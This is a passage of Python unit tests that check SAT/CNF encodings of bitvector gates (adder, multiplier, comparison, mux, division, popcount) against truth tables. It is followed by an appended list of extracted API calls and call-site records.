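# e.g. apply_truth_table_setting([3, 4], (1, 0)) == [3, -4].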
class TestEncodeBVRippleCarryAdderGate(unittest.TestCase):
def __test_for_truth_table(self, arity, use_carry_in, use_carry_out, truth_table):
for table_entry in truth_table:
input_setting, output_setting = table_entry
lhs_setting, rhs_setting, carry_in_setting = input_setting
output_setting, carry_out_setting = output_setting
checker = TrivialSATSolver()
lhs_input_lits = [checker.create_literal() for _ in range(0, arity)]
rhs_input_lits = [checker.create_literal() for _ in range(0, arity)]
carry_in = checker.create_literal() if use_carry_in else None
carry_out = checker.create_literal() if use_carry_out else None
clause_consumer = LoggingClauseConsumerDecorator(checker)
output_lits = bvg.encode_bv_ripple_carry_adder_gate(clause_consumer, checker,
lhs_input_lits, rhs_input_lits,
output_lits=None, carry_in_lit=carry_in,
carry_out_lit=carry_out)
# Compute the SAT solver assumption setting for this entry:
probe_lhs = apply_truth_table_setting(lhs_input_lits, lhs_setting)
probe_rhs = apply_truth_table_setting(rhs_input_lits, rhs_setting)
if use_carry_in:
probe_lhs.append(carry_in if carry_in_setting >= 1 else -carry_in)
probe_out = apply_truth_table_setting(output_lits, output_setting)
if use_carry_out:
probe_out.append(carry_out if carry_out_setting >= 1 else -carry_out)
# Check that the truth table entry satisfies the encoding:
assumptions_pos = list(itertools.chain(probe_lhs, probe_rhs, probe_out))
self.assertTrue(checker.solve(assumptions_pos),
"Encoding failed for truth table entry " + str(table_entry)
+ "\n(should be satisfiable, but is not)"
+ "\nEncoding:\n" + clause_consumer.to_string()
+ "\nAssumptions: " + str([x for x in assumptions_pos]))
# Check that the gate encodes a function by excluding the output configuration:
clause_consumer.consume_clause([-x for x in probe_out])
assumptions_neg = list(itertools.chain(probe_lhs, probe_rhs))
self.assertFalse(checker.solve(assumptions_neg),
"Encoding failed for truth table entry " + str(table_entry)
+ "\n(function property violated)"
+ "\nEncoding:\n" + clause_consumer.to_string()
+ "\nAssumptions: " + str([x for x in assumptions_neg]))
@staticmethod
def __generate_full_truth_table(input_width, carry_in_settings):
result = []
for lhs_setting in range(0, 2**input_width):
for rhs_setting in range(0, 2**input_width):
for carry_in_setting in carry_in_settings:
expected_output = lhs_setting + rhs_setting + carry_in_setting
expected_carry_output = 1 if expected_output & 2**input_width != 0 else 0
# Remove "overflowing" bit from output:
if expected_carry_output == 1:
expected_output = expected_output ^ 2**input_width
input_setting = (int_to_bitvec(lhs_setting, input_width),
int_to_bitvec(rhs_setting, input_width),
carry_in_setting)
output_setting = (int_to_bitvec(expected_output, input_width),
expected_carry_output)
result.append((input_setting, output_setting))
return result
def __truthtable_based_test(self, input_width, use_carry_in, use_carry_out):
carry_in_settings = [0, 1] if use_carry_in else [0]
truth_table = self.__generate_full_truth_table(input_width=input_width, carry_in_settings=carry_in_settings)
self.__test_for_truth_table(input_width, use_carry_in=use_carry_in, use_carry_out=use_carry_out,
truth_table=truth_table)
def test_for_bv_width_1_no_carries(self):
self.__truthtable_based_test(1, use_carry_in=False, use_carry_out=False)
def test_for_bv_width_1_input_carry(self):
self.__truthtable_based_test(1, use_carry_in=True, use_carry_out=False)
def test_for_bv_width_1_output_carry(self):
self.__truthtable_based_test(1, use_carry_in=False, use_carry_out=True)
def test_for_bv_width_1_all_carries(self):
self.__truthtable_based_test(1, use_carry_in=True, use_carry_out=True)
def test_for_bv_width_2_no_carries(self):
self.__truthtable_based_test(2, use_carry_in=False, use_carry_out=False)
def test_for_bv_width_2_input_carry(self):
self.__truthtable_based_test(2, use_carry_in=True, use_carry_out=False)
def test_for_bv_width_2_output_carry(self):
self.__truthtable_based_test(2, use_carry_in=False, use_carry_out=True)
def test_for_bv_width_2_all_carries(self):
self.__truthtable_based_test(2, use_carry_in=True, use_carry_out=True)
def test_for_bv_width_3_no_carries(self):
self.__truthtable_based_test(3, use_carry_in=False, use_carry_out=False)
def test_for_bv_width_3_input_carry(self):
self.__truthtable_based_test(3, use_carry_in=True, use_carry_out=False)
def test_for_bv_width_3_output_carry(self):
self.__truthtable_based_test(3, use_carry_in=False, use_carry_out=True)
def test_for_bv_width_3_all_carries(self):
self.__truthtable_based_test(3, use_carry_in=True, use_carry_out=True)
def test_for_bv_width_4_no_carries(self):
self.__truthtable_based_test(4, use_carry_in=False, use_carry_out=False)
def test_for_bv_width_4_input_carry(self):
self.__truthtable_based_test(4, use_carry_in=True, use_carry_out=False)
def test_for_bv_width_4_output_carry(self):
self.__truthtable_based_test(4, use_carry_in=False, use_carry_out=True)
def test_for_bv_width_4_all_carries(self):
self.__truthtable_based_test(4, use_carry_in=True, use_carry_out=True)
class AbstractTruthTableBasedBitvectorGateTest(abc.ABC):
"""
Base class for truth-table-based bitvector-gate tests.
"""
def __init__(self):
if not isinstance(self, unittest.TestCase):
raise RuntimeError("This mixin may only be used with test cases, since it uses assertRaises")
@abc.abstractmethod
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
"""
        Encodes the gate under test for the given gate arity, using `lit_factory` to create new literals
and `clause_consumer` to store the result.
:param clause_consumer: The clause consumer receiving the gate encoding.
:param lit_factory: The literal factory used to create new literals.
:param gate_arity: The gate's arity.
:return: a tuple (x,y) with x being the concatenation of the gate's input literals
and y being the concatenation of the gate's output literals. Note: the order and amount
of literals contained in x must equal the order and amount of assignments in the truth
table's input setting tuples (i.e. the i'th literal in x has the same meaning as the
i'th entry in the truth table's input settings). Likewise, the order and amount of literals
in y must equal the order and amount of assignments in the truth table's output setting
tuples.
"""
pass
@abc.abstractmethod
def generate_truth_table(self, gate_arity: int):
"""
        Generates the truth table which the encoder returned by get_bitvector_gate_encoder_under_test()
is supposed to satisfy.
        :param gate_arity: A positive integer.
        :return: A tuple [x_1, x_2, ..., x_(2^(2*gate_arity))] with, for all 1 <= i <= 2^(2*gate_arity), x_i being a tuple
(l+r, o) with l, r, o being tuples of length `gate_arity` containing elements in {0, 1}.
l signifies the left-hand-side input assignment, r signifies the right-hand-side
assignment, o signifies the output assignment. If there are two tuples (x, y1) and (x, y2), then
y1 = y2.
"""
@abc.abstractmethod
def get_bitvector_gate_encoder_under_test(self):
"""
Returns the bitvector gate encoder function under test.
:return: the bitvector gate encoder function under test.
"""
pass
@abc.abstractmethod
def is_encoder_under_test_bv_predicate(self):
"""
Returns True iff the encoder returned by get_bitvector_gate_encoder_under_test
encodes a bitvector predicate function
(i.e. the gate has a single output literal) and False iff the gate is a "full"
bitvector gate function (i.e. the gate has W output literals, where W is the
gate's arity).
:return: a bool value as described above.
"""
pass
def __test_for_truth_table(self, gate_arity: int):
truth_table = self.generate_truth_table(gate_arity)
for table_entry in truth_table:
input_setting, output_setting = table_entry
checker = TrivialSATSolver()
clause_consumer = LoggingClauseConsumerDecorator(checker)
# Encode the bitvector gate
input_lits, output_lits = self.encode_gate_under_test(clause_consumer, checker, gate_arity)
# Check that the setting satisfies the constraint
probe_input = apply_truth_table_setting(input_lits, input_setting)
probe_output = apply_truth_table_setting(output_lits, output_setting)
assumptions_pos = probe_input + probe_output
has_correct_value = checker.solve(assumptions_pos)
if not has_correct_value:
if checker.solve(probe_input):
print("The gate forces an incorrect model:")
checker.print_model()
else:
print("The gate has no satisfiable assignment for this input configuration")
# noinspection PyUnresolvedReferences
self.assertTrue(has_correct_value,
"Encoding failed for truth table entry " + str(table_entry)
+ "\n(should be satisfiable, but is not)"
+ "\nEncoding:\n" + clause_consumer.to_string()
+ "\nAssumptions: " + str(assumptions_pos))
# Check that no other output setting satisfies the constraint
clause_consumer.consume_clause([-x for x in probe_output])
assumptions_neg = probe_input
is_functional_rel = not checker.solve(assumptions_neg)
if not is_functional_rel:
print("Unexpectedly found model:")
checker.print_model()
# noinspection PyUnresolvedReferences
self.assertTrue(is_functional_rel,
"Encoding failed for truth table entry " + str(table_entry)
+ "\n(function property violated)"
+ "\nEncoding:\n" + clause_consumer.to_string()
+ "\nAssumptions: " + str(assumptions_neg))
def test_conforms_to_truth_table_for_bv_width_1(self):
self.__test_for_truth_table(gate_arity=1)
def test_conforms_to_truth_table_for_bv_width_2(self):
self.__test_for_truth_table(gate_arity=2)
def test_conforms_to_truth_table_for_bv_width_3(self):
self.__test_for_truth_table(gate_arity=3)
def test_conforms_to_truth_table_for_bv_width_4(self):
self.__test_for_truth_table(gate_arity=4)
def test_refuses_input_bv_with_length_mismatch(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, 2)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
# See assertion in __init__:
# noinspection PyCallByClass
# noinspection PyTypeChecker
with unittest.TestCase.assertRaises(self, ValueError):
encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits)
def test_uses_and_returns_provided_output_literals(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
output_lits = lit_factory.create_literal() if self.is_encoder_under_test_bv_predicate() \
else [lit_factory.create_literal() for _ in range(0, 3)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
if self.is_encoder_under_test_bv_predicate():
result = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
output_lit=output_lits)
# noinspection PyUnresolvedReferences
self.assertEqual(result, output_lits)
else:
result = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
output_lits=output_lits)
# noinspection PyUnresolvedReferences
self.assertEqual(list(result), output_lits)
def test_creates_output_literals_if_none_provided(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
all_inputs = lhs_input_lits + rhs_input_lits
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
result = encoder_under_test(clause_consumer, lit_factory, lhs_input_lits, rhs_input_lits)
if self.is_encoder_under_test_bv_predicate():
# noinspection PyUnresolvedReferences
self.assertTrue(result not in all_inputs)
# noinspection PyUnresolvedReferences
self.assertTrue(-result not in all_inputs)
else:
# noinspection PyUnresolvedReferences
self.assertFalse(any(x in all_inputs for x in result))
# noinspection PyUnresolvedReferences
self.assertFalse(any(-x in all_inputs for x in result))
class AbstractTruthTableBasedBitvectorToBitvectorGateTest(AbstractTruthTableBasedBitvectorGateTest):
"""
Base class for truth-table-based bitvector-gate tests where the encoded gate's output represents
a bitvector (i.e. the gate encoder returns a list of literals).
"""
def test_refuses_output_bv_with_length_mismatch(self):
lit_factory = TestLiteralFactory()
clause_consumer = CollectingClauseConsumer()
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, 3)]
output_lits = [lit_factory.create_literal() for _ in range(0, 2)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
# See assertion in __init__:
# noinspection PyCallByClass
# noinspection PyTypeChecker
with unittest.TestCase.assertRaises(self, ValueError):
encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
output_lits=output_lits)
def is_encoder_under_test_bv_predicate(self):
return False
class AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest(AbstractTruthTableBasedBitvectorToBitvectorGateTest):
"""
Base class for truth-table-based bitvector-gate tests where the encoded gate's output represents
a bitvector (i.e. the gate encoder returns a list of literals), where the bitvector encoder takes
no more arguments than
- clause_consumer: the clause consumer
- lit_factory: the literal factory
- lhs_input_lits, rhs_input_lits: the lhs rsp. rhs input literals
- output_lits: the output literals (optional argument)
"""
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
output_lits = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits)
return lhs_input_lits+rhs_input_lits, output_lits
class AbstractTruthTableBasedPlainBitvectorPredicateGateTest(AbstractTruthTableBasedBitvectorGateTest):
"""
Base class for truth-table-based bitvector-gate tests where the encoded gate's output is a single
literal, where the bitvector encoder takes no more arguments than
- clause_consumer: the clause consumer
- lit_factory: the literal factory
- lhs_input_lits, rhs_input_lits: the lhs rsp. rhs input literals
- output_lit: the output literal (optional argument)
"""
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
output_lit = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits)
return lhs_input_lits+rhs_input_lits, [output_lit]
def is_encoder_under_test_bv_predicate(self):
return True
#
# Tests for "plain" bitvector functions (and, or, xor, subtraction):
#
def generate_truth_table_for_binary_op(gate_arity: int, binary_op):
"""
Generates a truth table using the given binary operation on integers.
:param gate_arity: The gate's arity.
:param binary_op: A function mapping two integers to an integer.
:return: The truth table for a gate applying binary_op to the input bitvectors. Only the first `gate_arity`
bits of the result of invoking binary_op are considered. The returned object is a truth table in
the sense of AbstractTruthTableBasedBitvectorGateTest's documentation, with all possible input assignments
occurring in the truth table.
"""
truth_table = []
for lhs, rhs in itertools.product(range(0, 2 ** gate_arity), range(0, 2 ** gate_arity)):
output = binary_op(lhs, rhs)
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
int_to_bitvec(output, gate_arity))
truth_table.append(table_entry)
return truth_table
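# Hedged worked example (not part of the original module): assuming int_to_bitvec
# returns a gate_arity-length bit tuple,
#   generate_truth_table_for_binary_op(1, lambda x, y: x ^ y)
# yields [((0, 0), (0,)), ((0, 1), (1,)), ((1, 0), (1,)), ((1, 1), (0,))],
# i.e. one entry per (lhs, rhs) pair with the XOR of the inputs as the output bits.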
class TestEncodeBVAndGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_and_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_and_gate
def generate_truth_table(self, gate_arity: int):
return generate_truth_table_for_binary_op(gate_arity, lambda x, y: x & y)
class TestEncodeBVOrGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_or_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_or_gate
def generate_truth_table(self, gate_arity: int):
return generate_truth_table_for_binary_op(gate_arity, lambda x, y: x | y)
class TestEncodeBVXorGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_xor_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_xor_gate
def generate_truth_table(self, gate_arity: int):
return generate_truth_table_for_binary_op(gate_arity, lambda x, y: x ^ y)
class TestEncodeBvRippleCarrySubGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_ripple_carry_sub_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_ripple_carry_sub_gate
def generate_truth_table(self, gate_arity: int):
truth_table = []
for lhs, rhs in itertools.product(range(0, 2**gate_arity), range(0, 2**gate_arity)):
output = lhs - rhs
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
int_to_bitvec(output, gate_arity))
truth_table.append(table_entry)
return truth_table
#
# Tests for binary predicates (sle, ule, equality):
#
def generate_truth_table_for_bv_predicate(gate_arity: int, predicate):
"""
Generates a truth table using the given binary predicate on integers.
:param gate_arity: The gate's arity.
    :param predicate: A function mapping a triple (l, r, w) to a bool, with all but the
                      lowermost w bits of l and r being ignored.
:return: The truth table for a gate applying predicate to the input bitvectors.
The returned object is a truth table in the sense of AbstractTruthTableBasedBitvectorGateTest's
documentation, with all possible input assignments occurring in the truth table.
"""
truth_table = []
for lhs, rhs in itertools.product(range(0, 2 ** gate_arity), range(0, 2 ** gate_arity)):
output = predicate(lhs, rhs, gate_arity)
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
(1,) if output is True else (0,))
truth_table.append(table_entry)
return truth_table
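# Hedged worked example (not part of the original module): for gate_arity=1 and an
# equality predicate, generate_truth_table_for_bv_predicate yields
#   [((0, 0), (1,)), ((0, 1), (0,)), ((1, 0), (0,)), ((1, 1), (1,))]
# where the output is always a single-bit tuple, regardless of the gate arity.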
class TestEncodeBVUnsignedLessThanOrEqualCompGate(unittest.TestCase,
AbstractTruthTableBasedPlainBitvectorPredicateGateTest):
"""
Test for bvg.encode_bv_ule_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_ule_gate
def generate_truth_table(self, gate_arity: int):
predicate = lambda l, r, width: (l & (2**width - 1)) <= (r & (2**width - 1))
return generate_truth_table_for_bv_predicate(gate_arity, predicate)
class TestEncodeBVSignedLessThanOrEqualCompGate(unittest.TestCase,
AbstractTruthTableBasedPlainBitvectorPredicateGateTest):
"""
Test for bvg.encode_bv_sle_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_sle_gate
def generate_truth_table(self, gate_arity: int):
def __sign_extend(x: int, from_width: int):
self.assertTrue(from_width > 0)
sign = 1 if (x & (1 << (from_width-1))) != 0 else 0
sign_extension_mask = ~((1 << from_width) - 1)
if sign == 0:
return x & ~sign_extension_mask
else:
return x | sign_extension_mask
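        # Worked example (illustrative): __sign_extend(0b101, 3) == -3, since bit 2
        # is set, so 0b101 is OR-ed with ~0b111; Python's arbitrary-precision ints
        # interpret the resulting ...11111101 pattern as -3.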
predicate = lambda l, r, width: __sign_extend(l, width) <= __sign_extend(r, width)
return generate_truth_table_for_bv_predicate(gate_arity, predicate)
class TestEncodeBVEqualityCompGate(unittest.TestCase,
AbstractTruthTableBasedPlainBitvectorPredicateGateTest):
"""
Test for bvg.encode_bv_eq_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_eq_gate
def generate_truth_table(self, gate_arity: int):
predicate = lambda l, r, width: (l & (2**width - 1)) == (r & (2**width - 1))
return generate_truth_table_for_bv_predicate(gate_arity, predicate)
#
# Tests for binary multiplier gates:
#
class TestEncodeParallelBVMultiplierGateEncoder(AbstractTruthTableBasedBitvectorToBitvectorGateTest,
abc.ABC):
"""
Test for bvg.encode_bv_parallel_mul_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_parallel_mul_gate
@abc.abstractmethod
def is_test_with_overflow_output(self) -> bool:
pass
def generate_truth_table(self, gate_arity: int):
result = []
include_overflow_bit = self.is_test_with_overflow_output()
for lhs_setting in range(0, 2 ** gate_arity):
for rhs_setting in range(0, 2 ** gate_arity):
expected_output = lhs_setting * rhs_setting
expected_overflow = 1 if ((expected_output >> gate_arity) != 0) else 0
expected_output = expected_output & ((1 << gate_arity) - 1)
input_setting = int_to_bitvec(lhs_setting, gate_arity) + int_to_bitvec(rhs_setting, gate_arity)
                # Parenthesized so the conditional only selects the overflow tuple;
                # the unparenthesized original evaluated to an empty tuple whenever
                # include_overflow_bit was False, discarding the product bits.
                output_setting = int_to_bitvec(expected_output, gate_arity) + (
                    (expected_overflow,) if include_overflow_bit else tuple())
result.append((input_setting, output_setting))
return result
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
overflow_lit = lit_factory.create_literal() if self.is_test_with_overflow_output() else None
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
output_lits = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
overflow_lit=overflow_lit)
if overflow_lit is None:
return lhs_input_lits+rhs_input_lits, output_lits
else:
return lhs_input_lits+rhs_input_lits, (output_lits + [overflow_lit])
class TestEncodeParallelBVMultiplierGateEncoderWithOverflowLit(unittest.TestCase,
TestEncodeParallelBVMultiplierGateEncoder):
def is_test_with_overflow_output(self) -> bool:
return True
class TestEncodeParallelBVMultiplierGateEncoderWithoutOverflowLit(unittest.TestCase,
TestEncodeParallelBVMultiplierGateEncoder):
def is_test_with_overflow_output(self) -> bool:
return False
#
# Tests for bitvector MUX:
#
class TestEncodeBVMuxGateEncoder(unittest.TestCase,
AbstractTruthTableBasedBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_mux_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_mux_gate
def generate_truth_table(self, gate_arity: int):
result = []
for lhs_setting in range(0, 2 ** gate_arity):
for rhs_setting in range(0, 2 ** gate_arity):
for select_lhs_setting in (0, 1):
                    expected_output = lhs_setting if select_lhs_setting == 1 else rhs_setting
input_setting = int_to_bitvec(lhs_setting, gate_arity) + int_to_bitvec(rhs_setting, gate_arity) \
+ int_to_bitvec(select_lhs_setting, 1)
output_setting = int_to_bitvec(expected_output, gate_arity)
result.append((input_setting, output_setting))
return result
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
select_lhs_lit = lit_factory.create_literal()
output_lits = bvg.encode_bv_mux_gate(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
select_lhs_lit=select_lhs_lit)
return lhs_input_lits+rhs_input_lits+[select_lhs_lit], output_lits
#
# Tests for bitvector division encoders:
#
class TestEncodeBvLongUDivGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_long_udiv_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_long_udiv_gate
def generate_truth_table(self, gate_arity: int):
truth_table = []
for lhs, rhs in itertools.product(range(0, 2**gate_arity), range(0, 2**gate_arity)):
            output = (lhs // rhs) if rhs != 0 else 0
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
int_to_bitvec(output, gate_arity))
truth_table.append(table_entry)
return truth_table
class TestEncodeBvLongURemGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_long_urem_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_long_urem_gate
def generate_truth_table(self, gate_arity: int):
truth_table = []
for lhs, rhs in itertools.product(range(0, 2**gate_arity), range(0, 2**gate_arity)):
output = (lhs % rhs) if rhs != 0 else 0
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
int_to_bitvec(output, gate_arity))
truth_table.append(table_entry)
return truth_table
#
# Tests for unary bitvector gate encoders:
#
class TestEncodeStaggeredOrGate(unittest.TestCase):
def test_returns_empty_seq_when_no_inputs_provided(self):
clause_consumer = CollectingClauseConsumer()
lit_factory = TestLiteralFactory()
result = bvg.encode_staggered_or_gate(clause_consumer=clause_consumer, lit_factory=lit_factory, input_lits=[])
self.assertEqual(list(result), [], "Unexpected result " + str(result))
def test_raises_exception_when_input_and_output_sizes_mismatch(self):
clause_consumer = CollectingClauseConsumer()
lit_factory = TestLiteralFactory()
with self.assertRaises(ValueError):
bvg.encode_staggered_or_gate(clause_consumer=clause_consumer, lit_factory=lit_factory,
input_lits=[lit_factory.create_literal()],
output_lits=[lit_factory.create_literal(), lit_factory.create_literal()])
def test_encodes_equivalency_for_unary_input(self):
solver = TrivialSATSolver()
input_lit = solver.create_literal()
output_lit = solver.create_literal()
bvg.encode_staggered_or_gate(clause_consumer=solver, lit_factory=solver,
input_lits=[input_lit],
output_lits=[output_lit])
self.assertTrue(solver.solve([]), "Without further constraints, the gate encoding must be satisfiable")
self.assertFalse(solver.solve([input_lit, -output_lit]), "Unexpected: input not equivalent to output")
self.assertFalse(solver.solve([-input_lit, output_lit]), "Unexpected: input not equivalent to output")
def test_is_staggered_or_gate_for_ternary_input(self):
for test_index in range(0, 8):
solver = TrivialSATSolver()
input_lits = [solver.create_literal() for _ in range(0, 3)]
output_lits = bvg.encode_staggered_or_gate(clause_consumer=solver, lit_factory=solver,
input_lits=input_lits)
test_input = [input_lits[i] if (test_index & (1 << i)) != 0 else -input_lits[i] for i in range(0, 3)]
expected_output = [output_lits[i] if any(x > 0 for x in test_input[i:]) else -output_lits[i]
for i in range(0, 3)]
maps_input = solver.solve(test_input + expected_output)
self.assertTrue(maps_input, "The gate under test violates its input/output spec")
solver.consume_clause([-o for o in expected_output])
self.assertFalse(solver.solve(test_input), "Unexpected: encoding is not a gate encoding")
class TestEncodePopcountGate(unittest.TestCase):
def test_encodes_popcount_for_unary_input(self):
solver = TrivialSATSolver()
input_lit = solver.create_literal()
output_lit = solver.create_literal()
bvg.encode_bv_popcount_gate(clause_consumer=solver, lit_factory=solver, input_lits=[input_lit],
output_lits=[output_lit])
self.assertTrue(solver.solve([]), "Without further constraints, the gate encoding must be satisfiable")
self.assertFalse(solver.solve([input_lit, -output_lit]), "Unexpected: input not equivalent to output")
self.assertFalse(solver.solve([-input_lit, output_lit]), "Unexpected: input not equivalent to output")
def check_encodes_popcount_for_nary_input(self, width):
output_width = int(math.ceil(math.log2(width+1)))
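        # The popcount of `width` inputs ranges over 0..width, so
        # ceil(log2(width + 1)) output bits suffice (e.g. width=5 needs 3 bits).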
for i in range(0, 2**width):
solver = TrivialSATSolver()
input_lits = [solver.create_literal() for _ in range(0, width)]
output_lits = [solver.create_literal() for _ in range(0, output_width)]
bvg.encode_bv_popcount_gate(clause_consumer=solver, lit_factory=solver, input_lits=input_lits,
output_lits=output_lits)
reference_popcount = bin(i).count('1')
input_setting = apply_truth_table_setting(input_lits, int_to_bitvec(i, width))
expected_output_setting = apply_truth_table_setting(output_lits,
int_to_bitvec(reference_popcount,
output_width))
self.assertTrue(solver.solve(input_setting + expected_output_setting),
"The gate should be satisfiable under the expected output setting, but is not")
solver.consume_clause([-x for x in expected_output_setting])
self.assertFalse(solver.solve(input_setting),
"The gate should force the expected output setting, but does not")
def test_encodes_popcount_for_binary_input(self):
self.check_encodes_popcount_for_nary_input(2)
def test_encodes_popcount_for_ternary_input(self):
self.check_encodes_popcount_for_nary_input(3)
def test_encodes_popcount_for_4ary_input(self):
self.check_encodes_popcount_for_nary_input(4)
def test_encodes_popcount_for_5ary_input(self):
self.check_encodes_popcount_for_nary_input(5)
def test_raises_exception_for_empty_input(self):
with self.assertRaises(ValueError):
solver = TrivialSATSolver()
input_lits = []
bvg.encode_bv_popcount_gate(clause_consumer=solver, lit_factory=solver, input_lits=input_lits)
def test_raises_exception_for_mismatching_output_size(self):
with self.assertRaises(ValueError):
solver = TrivialSATSolver()
input_lits = [solver.create_literal() for _ in range(0, 8)]
output_lits = [solver.create_literal() for _ in range(0, 4)]
bvg.encode_bv_popcount_gate(clause_consumer=solver, lit_factory=solver,
input_lits=input_lits, output_lits=output_lits)
|
[
"math.log2",
"cscl.bitvector_gate_encoders.encode_bv_mux_gate",
"cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver",
"cscl.bitvector_gate_encoders.encode_staggered_or_gate",
"cscl_tests.testutils.logging_clause_consumer_decorator.LoggingClauseConsumerDecorator",
"cscl.bitvector_gate_encoders.encode_bv_ripple_carry_adder_gate",
"cscl.bitvector_gate_encoders.encode_gate_vector",
"cscl.bitvector_gate_encoders.encode_bv_popcount_gate",
"itertools.chain",
"unittest.TestCase.assertRaises"
] |
[((1359, 1493), 'cscl.bitvector_gate_encoders.encode_gate_vector', 'bvg.encode_gate_vector', (['clause_consumer', 'lit_factory', '__should_not_be_called'], {'lhs_input_lits': '[]', 'rhs_input_lits': '[]', 'output_lits': '[]'}), '(clause_consumer, lit_factory, __should_not_be_called,\n lhs_input_lits=[], rhs_input_lits=[], output_lits=[])\n', (1381, 1493), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((3697, 3874), 'cscl.bitvector_gate_encoders.encode_gate_vector', 'bvg.encode_gate_vector', (['clause_consumer', 'lit_factory', '__output_collecting_encoder'], {'lhs_input_lits': '[lits[0], lits[1]]', 'rhs_input_lits': '[lits[2], lits[3]]', 'output_lits': 'None'}), '(clause_consumer, lit_factory,\n __output_collecting_encoder, lhs_input_lits=[lits[0], lits[1]],\n rhs_input_lits=[lits[2], lits[3]], output_lits=None)\n', (3719, 3874), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((36018, 36201), 'cscl.bitvector_gate_encoders.encode_bv_mux_gate', 'bvg.encode_bv_mux_gate', ([], {'clause_consumer': 'clause_consumer', 'lit_factory': 'lit_factory', 